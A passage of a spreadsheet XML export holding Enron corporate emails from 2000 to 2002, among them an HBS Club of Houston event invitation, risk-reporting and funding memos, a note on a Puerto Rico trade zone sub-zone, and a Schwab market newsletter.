Mr. Vaughan received a B.A. in 1955 from Vanderbilt University, an M.B.A._x000D_
in 1961 from the Harvard Business School, where he was a J. Spencer Love_x000D_
Fellow, and earned the Chartered Financial Analyst designation in 1969._x000D_
_x000D_
Reservations for this HBS event can be made by phone, fax (using following_x000D_
form), email or by using our website =01&amp;hbshouston.org=018._x000D_
_x000D_
Please mark your calendars for the following future HBS events:_x000D_
  =01=07  April 26 - Social at Slainte=01,s (downtown) 6:00 to 8:00 pm_x000D_
  =01=07  May 3 - Breakfast Club meets at ROCC at 7:00 am_x000D_
  =01=07  May 16 - Cooking class &amp; dinner at Brennan=01,s, 6:30 to 8:30 pm,=_x000D_
 spouses_x000D_
welcome_x000D_
  =01=07  May 17 - Breakfast Club meets at ROCC at 7:00 am_x000D_
  =01=07  May 22 - Dave Clementz, President of Chevron Petroleum Technology_x000D_
Company, 11:45 am to 1:15 pm, location TBD_x000D_
  =01=07  May 31 - Social, location TBD, 6:00 to 8:00 pm_x000D_
  =01=07  June 7 - Breakfast Club meets at ROCC at 7:00 am_x000D_
  =01=07  June 14 - Howard Stevenson, HBS Professor, 5:30 pm to 7:30 pm,_x000D_
location TBD; club final meeting, spouses welcome_x000D_
  =01=07  June 21 - Breakfast Club meets at ROCC at 7:00 am_x000D_
_x000D_
I hope you choose to join us for this and many future events._x000D_
_x000D_
Kind regards,_x000D_
George Laflin, President_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
RESERVATIONS REQUIRED.  Reservations accepted until noon on May 4, 2001._x000D_
Fax following information to 281/424-4770, e-mail_x000D_
dottie@kerr-solutions.com, or call 281/424-3084._x000D_
_x000D_
Member Name:_x000D_
Company:_x000D_
Phone:_x000D_
Guest Name:_x000D_
Sustaining Members: No Charge_x000D_
Members: $20     Guests: $25_x000D_
Payment:  Credit Card (Visa, MC)_x000D_
Card Number:_x000D_
Exp Date:_x000D_
_x000D_
_x000D_
***************_x000D_
Dottie Kerr (dottie@kerr-solutions.com)_x000D_
Administrator for Harvard Business School Club of Houston_x000D_
http://www.hbshouston.org/_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Jun 2000 10:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gareth.bahlmann@enron.com'})</t>
  </si>
  <si>
    <t>FW: ENRON</t>
  </si>
  <si>
    <t xml:space="preserve">Please call me to discuss._x000D_
_x000D_
---------------------- Forwarded by Gareth Bahlmann/HOU/ECT on 06/19/2000 _x000D_
05:32 PM ---------------------------_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Jeff Nogid                           06/16/2000 10:56 AM_x000D_
	_x000D_
_x000D_
To: Gareth Bahlmann/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: ENRON_x000D_
_x000D_
Gareth_x000D_
_x000D_
Here is a funding vehicle from Bear Stearns that we are interested to sign.  _x000D_
It is supposed to closely mimic the details  of the recent Corp revolvers.  _x000D_
Let's get together an talk about it. _x000D_
_x000D_
Thanks_x000D_
Jeff_x000D_
---------------------- Forwarded by Jeff Nogid/HOU/ECT on 06/16/2000 10:50 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Blair, Tom (Exchange)" &lt;blair@bear.com&gt; on 06/13/2000 05:58:18 PM_x000D_
To: "'jeff.nogid@enron.com'" &lt;jeff.nogid@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: ENRON_x000D_
_x000D_
_x000D_
_x000D_
Jeff,_x000D_
_x000D_
Please find following the info which you requested.  When you have had a_x000D_
chance to review please send changes/comments to Andrea Labonte_x000D_
212-272-0832._x000D_
_x000D_
Thanks._x000D_
_x000D_
Tom_x000D_
_x000D_
&gt;  &lt;&lt;5C7X01!.doc&gt;&gt;_x000D_
_x000D_
 - 5C7X01!.doc_x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
Bear Stearns is not responsible for any recommendation, solicitation,_x000D_
offer or agreement or any information about any transaction, customer_x000D_
account or account activity contained in this communication._x000D_
***********************************************************************_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 15:10:06 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: DPR reporting for 22nd trading due today - request by Fallon</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Bob,_x000D_
 _x000D_
What is the plan for this going forward?  I am expecting that you will want to use my risk estate employees for this, I am correct?_x000D_
 _x000D_
Stacey_x000D_
-----Original Message-----_x000D_
From: Abel, Chris _x000D_
Sent: Monday, January 28, 2002 3:34 PM_x000D_
To: Hall Jr., Robert L.; Gossett, Jeffrey C.; White, Stacey W.; Albrecht, Kristin; Reeves, Kathy; Gillis, Brian; Pearce, Barry; Miralles, Albert; Hall, D. Todd; Sweeney, Kevin; Earnest, Scott; Fondren, Mark; Swinney, John; Prejean, Frank; Horn, Cindy; Thurbin, Simon; Sharma, Shifali; Mao, Shari; Postlethwaite, John; Evans, Casey; Glover, Sheila; Carrington, Clara; Best, John_x000D_
Cc: Beck, Sally; Wilson, Shona; Considine, Keith; Trevino, Susan; Ayala, Susie; Apollo, Beth_x000D_
Subject: FW: DPR reporting for 22nd trading due today - request by Fallon_x000D_
_x000D_
_x000D_
As a follow up to this email, we will start reporting the DPR's on Wednesday's and Monday's, for Tuesday and Friday valuations.  The first Wednesday will be the 30th of January.  Each day we should expect to report the positions, P&amp;L and PRMA of only those transactions we expect to fulfill.  With the exception of Gas, Susan Trevino will be sending the benchmarks to each of the groups for their review.  _x000D_
 _x000D_
If anyone anticipates any problems with this time frame, please call me or Shona to discuss._x000D_
 _x000D_
Chris_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Abel, Chris _x000D_
Sent: Thursday, January 24, 2002 11:29 AM_x000D_
To: Hall Jr., Robert L.; Gossett, Jeffrey C.; White, Stacey W.; Albrecht, Kristin; Reeves, Kathy; Gillis, Brian; Pearce, Barry; Miralles, Albert; Hall, D. Todd; Sweeney, Kevin; Earnest, Scott; Fondren, Mark; Swinney, John; Prejean, Frank; Horn, Cindy; Thurbin, Simon; Sharma, Shifali; Mao, Shari; Postlethwaite, John; Evans, Casey; Glover, Sheila; Carrington, Clara_x000D_
Cc: Beck, Sally; Wilson, Shona; Considine, Keith; Trevino, Susan; Ayala, Susie; Apollo, Beth_x000D_
Subject: DPR reporting for 22nd trading due today - request by Fallon_x000D_
_x000D_
_x000D_
Fallon has requested a DPR be prepared 2X a week for positions that we are executing on (active/live positions only, no terminations or deals we are not executing on).  We have put together the shell of how this DPR will look.  To start this process we are planning to present to him positions (column E) and PRM value (column X) as of 1/23.  To do this, we have laid out the following steps:_x000D_
 _x000D_
- we need to get the PRM values directly from you (column X)_x000D_
- we will run the benchmarks and need to work with you to ensure you are happy with the benchmark numbers we have pulled from RMS (the exception is gas, we need the gas risk group to provide the gas bench to us)_x000D_
- we need all of then exceptions/qualifications to your numbers_x000D_
- we will need the other information in the schedule to be reported to us starting next week, but not for this exercise_x000D_
 _x000D_
Please confirm to me/Shona that you can get us this info by 230 pm today._x000D_
 _x000D_
Lastly, I am attaching the unofficialized book list as these books will not make it into the benchmarks and need you to confirm that there are no 3rd party positions in these books._x000D_
 _x000D_
Thanks in advance_x000D_
_x000D_
Chris Abel _x000D_
Manager, Risk Controls _x000D_
Global Risk Operations _x000D_
chris.abel@enron.com &lt;mailto:chris.abel@enron.com&gt; _x000D_
713.853.3102 _x000D_
_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Wed, 16 May 2001 07:00:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'miguel.maltes@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'greg.curran@enron.com'})</t>
  </si>
  <si>
    <t>Free Trade Zone</t>
  </si>
  <si>
    <t>I met with Johnny R. Fern?ndez, Esq., Executive Director of Codezol, C.D. (Corporaci?n para el Desarrollo de la Zona Libre de Ponce, C.D.).  Codezol, C.D. is the Foreign Trade Zone #163 at Ponce, PR.  I requested information regarding the license to operate a sub zone under the Foreign Trade Zone #163._x000D_
_x000D_
Codezol presents the application form to the Free Trade Zone Board in Washington.  The paperwork needed is very extensive, requires specific information and is prepared by a law firm that is specialized in these matters.  He recommends two law firms: Miller &amp; Company, Marshall V. Miller in Washington, DC which as per Codezol is the more experienced in these matters and Phelan &amp; Mitri from Connecticut which where the ones that helped Peerless Oil &amp; Gas get their sub zone._x000D_
_x000D_
A good start would be a letter from us which should include our location, legal description of the property, the exact a creage, number of tanks and their capacities, if we are a local company or subsidiary of a US firm._x000D_
_x000D_
When I mentioned to Mr. Fern?ndez if we can have a sub zone for ProCaribe and EcoEl?ctrica he doesn't see much problem but he needs to know more details of ProCaribe and EcoEl?ctrica to see if we can ask for one or two sub zones._x000D_
_x000D_
BENEFITS OF A SUB ZONE_x000D_
_x000D_
v	No import tax "Crudita" paid until the sale is done.  You don't pay "Crudita" while the propane is in our tanks or when there is a re export.  It helps with the cash flow._x000D_
_x000D_
v	You don't pay personal property tax.  ProCaribe pays around $150,000 per year._x000D_
_x000D_
v	You don't pay "Patentes" (%of yearly revenue tax) for any volume of re export.  Only for local sales. 	Patentes are paid to the Pe?uelas Municipality._x000D_
_x000D_
Fees of around $25,000 per year have to be paid to Codezol._x000D_
_x000D_
Weekly reports of inventories have to be sent to Codezol.  Facilities inspections will be held by Codezol, Crim, and US Customs prior to receiving the license._x000D_
_x000D_
The process can take from 9 months to 12 months.  It is faster in products like propane and natural gas, is slower in products like diesel or gasoline._x000D_
_x000D_
I spoke with Suzanne Clapp and she told me she doesn't have experience in free trade zones.  She mentioned the name of Armando Lima that can put us in contact with the Free Trade Zone personnel in Puerto Rico.   _x000D_
_x000D_
It took Peerless 14 months to get the sub zone because there was some "prejudice with oil during the Clinton Administration".  It costs them $60,000 in legal fees and it was done by Phelan &amp; Mitri._x000D_
_x000D_
Marshall Miller did the Codezol license and it cost $40,000 in legal fees but it was much less work than the one done by Peerless._x000D_
_x000D_
As per Mr. Fern?ndez, the next step is a short history of us so he can understand who we are and what we do._x000D_
_x000D_
Any questions please let me know so I can pass it on to Codezol._x000D_
_x000D_
Saludos</t>
  </si>
  <si>
    <t>Thu, 28 Jun 2001 08:24:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Letter from Michael L. Kirby to Senator Joseph L. Dunn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Vickie Biernacke" &lt;vickieb@pkns.com&gt;@ENRON [mailto:IMCEANOTES-+22Vickie+20Biernacke+22+20+3Cvickieb+40pkns+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, June 28, 2001 10:08 AM_x000D_
To:	Sanders, Richard B._x000D_
Cc:	Debbie Castro_x000D_
Subject:	Letter from Michael L. Kirby to Senator Joseph L. Dunn_x000D_
_x000D_
I attaching a letter from Mr. Kirby to Senator Dunn in both WordPerfect and Microsoft Word.  Please call me at 619-557-4471 if you have any problems with the document.  Thank you._x000D_
_x000D_
The information contained in this e-mail message and any accompanying documents is subject to the attorney-client privilege and/or the attorney work product rule and is confidential business information intended only for the use of the individual or entity named above.  If the reader of this message is not the intended recipient or representative of the recipient, you are hereby notified that any dissemination of this communication is strictly prohibited.  If you have received this communication in error, please notify Kathryn A. Pugh at kpugh@pkns.com and immediately delete this message from your system._x000D_
_x000D_
 - DUNNLR.WPD _x000D_
 - #288539v1 -DUNN LR.doc </t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 06:29:14 -0800 (PST)</t>
  </si>
  <si>
    <t>Morning Market View for November 02, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Charles Schwab &amp; Co., Inc._x000D_
Email Alert_x000D_
_x000D_
Morning Market View(TM) _x000D_
for Friday, November 2, 2001_x000D_
as of 9:30AM EST_x000D_
Information provided by Schwab Center for Investment Research_x000D_
_x000D_
_x000D_
WEAK EMPLOYMENT DATA FAILS TO PHASE MARKETS_x000D_
_x000D_
Equity index futures were lower but climbing back from earlier _x000D_
losses suffered as a result of this morning's dismal employment _x000D_
report. The unemployment rate climbed to its highest level in _x000D_
almost five years as the impact of the terrorist attacks has _x000D_
served to prolong the economic malaise. In equities news, the _x000D_
Justice Department has officially agreed to a settlement in the _x000D_
anti-trust case against Microsoft Corp. (MSFT,62,f1)._x000D_
_x000D_
The U.S. Justice department announced that it had agreed to a _x000D_
settlement with Microsoft, which will be presented to the _x000D_
Federal Judge overseeing the case today. The accord will impose _x000D_
a "broad range" of restrictions for the company lasting for at _x000D_
least five years. The 18 states involved in the antitrust case _x000D_
have not agreed to the provisions of the settlement and are _x000D_
expected to ask Judge Colleen Kollar-Kotelly for an extension of _x000D_
time to review the terms._x000D_
_x000D_
BEA Systems (BEAS,11.70,f1) reduced its 3Q and 4Q guidance after _x000D_
the bell last night and said that it would be forced to cut up _x000D_
to 10% of its staff, owing to the sluggish economy. The _x000D_
application server software maker said it expects 3Q earnings, _x000D_
excluding charges and items, of $0.05-$0.06 per share, below the _x000D_
First Call $0.08 per share consensus, amid lower than expected _x000D_
revenue. BEAS is forecasting 4Q revenue growth in the low single _x000D_
digits and earnings of $0.06-$0.07 per share, below the Street's _x000D_
mean $0.09 per share estimate._x000D_
_x000D_
Health insurance giant Cigna Corp. (CI,72) posted 3Q profits of _x000D_
$1.66 per share, excluding a $33 million gain from the sale of a _x000D_
reinsurance business, well ahead of the First Call consensus _x000D_
estimate of $1.58 per share. However, the company's medical risk _x000D_
loss ratio rose by 1.6%, suggesting potential profit margin _x000D_
erosion going forward. Medical risk loss ratio is a key measure _x000D_
of medical cost coverage ability._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
TREASURY AND ECONOMIC SUMMARY _x000D_
_x000D_
Treasuries were mixed after swinging wildly following the _x000D_
release of this morning's weaker-than-expected employment _x000D_
report. According to the Labor Department, the unemployment rate _x000D_
rose to 5.4% in October from September's 4.9% level. Analysts _x000D_
per Dow Jones Newswires were looking for a rate of 5.2%. _x000D_
Non-farm payrolls declined by 415,000, the largest one-month _x000D_
drop since 1980, after September's downward revision to a _x000D_
213,000 decline from the previously reported 199,000 drop. _x000D_
Average hourly earnings rose to $14.47 from the prior month's _x000D_
$14.45. The services-producing sector cut 241,000 jobs, while _x000D_
the manufacturing industry eliminated 142,000 positions. The _x000D_
bleak employment situation, reflecting the economic impact of _x000D_
the terrorist attacks, leaves the door open for continued _x000D_
aggressive monetary easing._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
WORLD MARKETS _x000D_
_x000D_
Technology stocks paced the advance in Europe on the heels of a _x000D_
Semiconductor Industry Association report yesterday. The report _x000D_
indicates that September was the third-consecutive month of a _x000D_
decelerating demand slowdown. However, the gains were muted _x000D_
somewhat by the release of a worse-than-expected German _x000D_
Purchasing Managers' Index report. The business index for _x000D_
October fell to 42.0 from September's 45.1, its _x000D_
seventh-consecutive month of contraction. UK insurance giant _x000D_
Prudential PLC (PUK,21) said that it will cut 2,100 jobs to _x000D_
lower expenses. Consumer staples giant Unilever (UL,29) reported _x000D_
better-than-expected 3Q operating profits and stuck to its _x000D_
guidance for at least 10% growth in fiscal year earnings. The _x000D_
euro was slightly higher against the U.S. dollar. The Bloomberg _x000D_
European 500 index was up 0.43% as of 8:53 a.m. EST._x000D_
_x000D_
Asian stocks were mixed but mostly higher on strength in the _x000D_
brokerage and technology sectors. Results were mixed as _x000D_
semiconductor stocks got a big boost on the favorable SIA _x000D_
report, but electronic components maker TDK Corp. (TDK,47) _x000D_
posted weak fiscal first-half profits, lowered full-year _x000D_
guidance and warned of more job cuts amid waning demand. _x000D_
Although a Liberal Democratic Party panel is pushing for _x000D_
inflation targets in Japan, Bank of Japan Governor Masaru Hayami _x000D_
called the idea "absurd," despite rhetoric from the BOJ Finance _x000D_
Minister aimed at mitigating deflationary pressures. The yen was _x000D_
slightly higher against the dollar._x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
FUTURES WATCH _x000D_
_x000D_
In the December Globex futures contract as of 8:53 a.m. EST, the _x000D_
S&amp;P 500 index was unchanged (1 point below fair value) while the _x000D_
Nasdaq 100 index was also unchanged (7 points below fair value). _x000D_
The December DJIA futures contract was down 15 points (27 points _x000D_
below fair value) and the December crude oil futures traded on _x000D_
the NYMEX were down $0.12 at $20.27/barrel._x000D_
_x000D_
William Johnson, Market Analyst_x000D_
_x000D_
================================================================_x000D_
_x000D_
LOGIN to access your account:_x000D_
_x000D_
https://investing.schwab.com/trading/start_x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
To unsubscribe or modify your Email Alert customization options,_x000D_
log in using the link below or copy and paste it into your _x000D_
browser's address window:_x000D_
_x000D_
https://investing.schwab.com/trading/start?SANC=EAMyAlerts_x000D_
_x000D_
----------------------------------------------------------------_x000D_
_x000D_
Notice: All email sent to or from the Charles Schwab corporate _x000D_
email system may be retained, monitored and/or reviewed _x000D_
by Schwab personnel. (0801-11478)_x000D_
_x000D_
Charles Schwab &amp; Co., Inc. ("Schwab") is a member of the NYSE, _x000D_
other major U.S. Securities Exchanges, and SIPC. Schwab is a _x000D_
specialist in various securities on the Pacific, Boston and _x000D_
Cincinnati Stock Exchanges and is subsidiary of The Charles _x000D_
Schwab Corporation, which is listed on the NYSE and trades _x000D_
under the symbol "SCH". Schwab Capital Markets L.P. is a member _x000D_
of the NASD and SIPC._x000D_
_x000D_
Schwab Capital Markets L.P. is also a subsidiary of The Charles _x000D_
Schwab Corporation and is a market maker in approximately _x000D_
4,900 securities._x000D_
_x000D_
Schwab Center for Investment Research ("SCIR") is part of _x000D_
Charles Schwab &amp; Co., Inc. The information contained herein is _x000D_
obtained from sources believed to be reliable, but its accuracy _x000D_
or completeness is not guaranteed. This report is for _x000D_
informational purposes only and is not a solicitation, or a _x000D_
recommendation that any particular investor should purchase or _x000D_
sell any particular security. Schwab does not assess the _x000D_
suitability or the potential value of any particular _x000D_
investment. All expressions of opinions are subject to change _x000D_
without notice. The Charles Schwab Corporation, Schwab, Schwab _x000D_
Capital Markets L.P. and its officers, directors, employees, _x000D_
consultants and/or members of their families may have a position_x000D_
in, and may from time to time, purchase or sell any of the _x000D_
mentioned or related securities including derivatives in such _x000D_
securities. At any given time, Schwab specialists, or Schwab _x000D_
Capital Markets L.P. market makers, may have an inventory _x000D_
position, either "long" or "short" in any security mentioned in _x000D_
this report as a result of their specialist/market making _x000D_
functions, respectively. Additionally, Schwab or Schwab _x000D_
Capital Markets L.P. may be on the opposite side of orders _x000D_
executed on the floor of the Pacific, Boston and/or Cincinnati _x000D_
Stock Exchanges or over-the-counter market respectively, as _x000D_
well. Schwab (or persons related thereto) or consultants may _x000D_
perform or solicit investment banking or other business from _x000D_
any company mentioned in this report. _x000D_
(C)2001 Charles Schwab &amp; Co., Inc._x000D_
_x000D_
1) Schwab Capital Markets L.P. makes a market in this security. _x000D_
2) Schwab is a specialist in this security. _x000D_
3) Schwab has managed or co-managed a public offering in this _x000D_
   security within the last three years. _x000D_
4) An employee of Schwab is a Director of this company. _x000D_
5) An analyst covering this stock has an investment position. _x000D_
_x000D_
Commercial use or redistribution in any form, print or _x000D_
electronic, is prohibited._x000D_
_x000D_
Distribution by Quris, Inc._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 15:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Recognized for Policy of Inclusion</t>
  </si>
  <si>
    <t>Read about Enron's inclusion on the Gay Financial Network's "gfn.com 50" in _x000D_
eBiz._x000D_
_x000D_
Also in this issue:_x000D_
FGT's Phase IV expansion_x000D_
Clickpaper.com is added to two industry web sites_x000D_
EES uses the 'Net to catch new customers_x000D_
Learn what a swap is_x000D_
_x000D_
It's all in the latest eBiz.  Go to home.enron.com, click Publications, then _x000D_
click eBiz, and "eBiz May 11, 2001."</t>
  </si>
  <si>
    <t>Thu, 10 Feb 2000 08:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Ed Krapels</t>
  </si>
  <si>
    <t>Louise, _x000D_
_x000D_
Some time ago I sent you a message regarding Ed Krapels. He is writing a book _x000D_
on energy_x000D_
commodity markets and would like to learn more about EOL. _x000D_
_x000D_
Can you give him a  call and chat with him for 10 minutes. He is a good _x000D_
friend of Enron and_x000D_
it would be free ad for us._x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 23:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekly Calendar</t>
  </si>
  <si>
    <t>(See attached file: wcal.pdf)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
 - wcal.pdf</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 05:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Part I of Staff Report</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 11/10/2000 01:10 PM -----_x000D_
_x000D_
	Sarah Novosel_x000D_
	11/08/2000 09:44 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: Maureen McVicker/NA/Enron@Enron_x000D_
		 Subject: Part I of Staff Report_x000D_
_x000D_
_x000D_
Here is Part I of the Staff report (on Calfornia)._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 13:41:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Information needs survey - extended</t>
  </si>
  <si>
    <t>I think that EES would like to send out some regulatory information on a re=_x000D_
gular basis.  Maybe qty instead of monthly.  Nothing formal right now._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Hartfield, Rita =20_x000D_
Sent:=09Tuesday, October 23, 2001 8:38 AM_x000D_
To:=09Steffes, James D._x000D_
Subject:=09RE: Information needs survey - extended_x000D_
_x000D_
Jim, can you elaborate on "customer newsletter/monthly policy position"_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Steffes, James D. =20_x000D_
Sent:=09Monday, October 22, 2001 9:15 AM_x000D_
To:=09Hartfield, Rita_x000D_
Subject:=09FW: Information needs survey - extended_x000D_
_x000D_
_x000D_
My Top 5_x000D_
_x000D_
_x000D_
1.=09(  )  *Up to the minute restructuring data._x000D_
_x000D_
2.=09(  )  Catalog of Enron public documents [policy talking points, handou=_x000D_
ts]_x000D_
_x000D_
3.=09(  )  Thumbnail analyses by industry experts on various topics_x000D_
_x000D_
4.=09(  )  *Enron formal documents [filings, comments, testimony]_x000D_
_x000D_
5.=09   Other - CUSTOMER NEWSLETTER / MONTHLY POLICY POSITION "push"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Dernehl, Ginger =20_x000D_
Sent:=09Wednesday, October 17, 2001 2:26 PM_x000D_
To:=09Alamo, Joseph; Allegretti, Daniel; Allen, Joe; Alvarez, Ramon; Arefie=_x000D_
va, Maria; Assad, Sergio; Assaf, Lisa; Barnes, Lynnette; Bellas, Kirsten; B=_x000D_
enson, Eric; Bestard, Jose; Binns, Darran; Bolton, Scott; Boston, Roy; Braz=_x000D_
, Gisele; Briggs, Tom; Buerger, Rubena; Burns, Stephen; Canovas, Guillermo;=_x000D_
 Cantrell, Rebecca W.; Comnes, Alan; Connor, Joe; Cooney, Carolyn; Crowther=_x000D_
, Mark; Dasovich, Jeff; Davies, Philip; Dawson, Paul; Decker, Larry; Derneh=_x000D_
l, Ginger; Devlin, Brendan; Dindarova, Nailia; Dressler, Jean; Duvauchelle,=_x000D_
 Antoine; Elms, Nick; Fitzgibbon, Tom; Floris, Vinio; Frank, Robert; Fromer=_x000D_
, Howard; Fulton, Donna; Gaillard, Bruno; Glen, Merle; Gottfredson, Bryan; =_x000D_
Grimes, Michael; Guerrero, Janel; Haizmann, Jan; Hamilton, Allison; Hardy J=_x000D_
r, John; Hartfield, Rita; Hawkins, Bernadette; Hemstock, Robert; Hennemeyer=_x000D_
, Paul; Hetrick, Nancy; Hoatson, Tom; Huang, Karen; Huertas, Alfredo; Huete=_x000D_
r, Barbara A.; Hughes, Llewelyn; Hunter, Bevin; Huson, Margaret; Hussain, M=_x000D_
ustafa; Ibrahim, Amr; Imai, Makiko; Ingersoll, Richard; Irwin, Kerryann; Ka=_x000D_
ufman, Paul; Kean, Steven J.; Keenan, Amber; Keene, Patrick; Kimura, Takash=_x000D_
i; Kingerski, Harry; Kishigami, Kikumi; Knight, Laurie; Landwehr, Susan M.;=_x000D_
 Lassere, Donald; Lawner, Leslie; Lawrence, Linda L.; Leibman, Lara; Leonar=_x000D_
do, Sam; Levy, Alberto; Lindberg, Susan; Linnell, Elizabeth; Mara, Susan; M=_x000D_
aurer, Luiz; McVicker, Maureen; Migden, Janine; Milano, Pamela; Miller, Ter=_x000D_
ri; Montovano, Steve; Nersesian, Carin; Neustaedter, Robert; Nicolay, Chris=_x000D_
ti L.; Nord, Sue; Noske, Linda J.; Novosel, Sarah; O'connell, Earlene; O'Da=_x000D_
y, Nicholas; Ogenyi, Gloria; Ozegalska, Justyna; Palmer, Germain; Perez, Ca=_x000D_
rmen; Perez, Gus; Perrino, Dave; Petrochko, Mona L.; Pharms, Melinda; Reis,=_x000D_
 Jose Lucio; Reyna, Margo; Rishe, Frank; Rizzo, Helen; Roan, Michael; Rober=_x000D_
tson, Linda; Robinson, Marchris; Rodriquez, Andy; Ryall, Jean; Sampaio, Fre=_x000D_
d; Shapiro, Richard; Shelk, John; Shortridge, Pat; Staines, Dan; Steffes, J=_x000D_
ames D.; Stephens, Sharonda; Stransky, Joan; Stroup, Kerry; Styles, Peter; =_x000D_
Sullivan, Kathleen; Sullivan, Lora; Thome, Jennifer; Tiberi, Fino; Twiggs, =_x000D_
Thane; Van Biert, Teun; Walton, Steve; Warner, Geriann; Watanabe, Mika; Woo=_x000D_
d, Doug; Yeung, Charles; Yoho, Lisa_x000D_
Subject:=09FW: Information needs survey - extended_x000D_
_x000D_
Please see note from Elizabeth below, and respond directly to Rita Hartfiel=_x000D_
d by tomorrow!!!_x000D_
_x000D_
Ginger Dernehl_x000D_
Administrative Coordinator_x000D_
Global Government Affairs_x000D_
Phone# 713-853-7751_x000D_
Fax# 713-646-8160_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Linnell, Elizabeth =20_x000D_
Sent:=09Wednesday, October 17, 2001 1:56 PM_x000D_
To:=09Dernehl, Ginger_x000D_
Subject:=09FW: Information needs survey - extended_x000D_
_x000D_
I wanted to be sure that everyone had the opportunity to give their input i=_x000D_
f interested!  If you haven't already responded, below is a list of potenti=_x000D_
al/existing information resources and we invite you to identify your top fi=_x000D_
ve priorities (1=3Dhigh).  Responses should be directed to Rita Hartfield b=_x000D_
y tomorrow, October 18th._x000D_
_x000D_
Thanks!_x000D_
Elizabeth_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Linnell, Elizabeth =20_x000D_
Sent:=09Friday, October 12, 2001 12:41 PM_x000D_
To:=09Dernehl, Ginger_x000D_
Subject:=09Information needs survey_x000D_
_x000D_
Ginger - Please forward to Gov't Affairs group.  Thanks!_x000D_
_x000D_
We're trying to identify information needs - both specific and general.  Ma=_x000D_
ny of these are already provided, and response to this survey will help in =_x000D_
identifying new services and prioritizing/improving existing offerings.  De=_x000D_
pending on the response to each offering, most will likely be made availabl=_x000D_
e.  For this effort, please rank up to five choices in the list below (1=3D=_x000D_
highest).  We'll tally the results, identify which items will have priority=_x000D_
 and communicate back how those needs will direct implementation efforts.  =_x000D_
Please note that items marked with (*) would require your input.  Please cl=_x000D_
ick on Forward for this message to allow you to type in your ranking number=_x000D_
s, and send the response to Rita Hartfield by Wednesday, October 17._x000D_
_x000D_
Thanks!_x000D_
Elizabeth_x000D_
_x000D_
(  )  Catalog of web resources.  [Including websites, electronic documents]_x000D_
_x000D_
(  )  Catalog of Enron presentations and group member presentations.=20_x000D_
_x000D_
(  )  Catalog of statistical data and information (some in slide format).  =_x000D_
[Might include information like generation statistics, company information,=_x000D_
 various maps, customer migration data, and anything else of general intere=_x000D_
st and use.]_x000D_
_x000D_
(  )   Individual access to in-depth research tools [Might include access t=_x000D_
o Lexis.com, market data tools like PowerDat, etc]  Most applications would=_x000D_
 require some level of training, and might involve subscription costs._x000D_
_x000D_
(  ) Primary research contact assigned by subject matter expertise.._x000D_
_x000D_
(  )  Catalog of Enron internal position statements_x000D_
_x000D_
_x000D_
(  )  Ad-hoc research upon request._x000D_
_x000D_
(  )  News clipping services_x000D_
_x000D_
(  )  *Group calendar of significant events with links to associated docume=_x000D_
nts._x000D_
_x000D_
(  )  Catalog of print  publications that we currently own that would be av=_x000D_
ailable for loan [books, periodicals, studies]_x000D_
_x000D_
_x000D_
(   )_x000D_
How much time per week are you willing to spend to contribute to certain it=_x000D_
ems (marked with *):      hours</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Year 2000 Objectives Report -- Federal Government Affairs</t>
  </si>
  <si>
    <t xml:space="preserve">Here it is!_x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Aug 2001 14:35:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marlene.hilliard@enron.com'})</t>
  </si>
  <si>
    <t>FW: 8743 Meter Set Up; Fac# 501869</t>
  </si>
  <si>
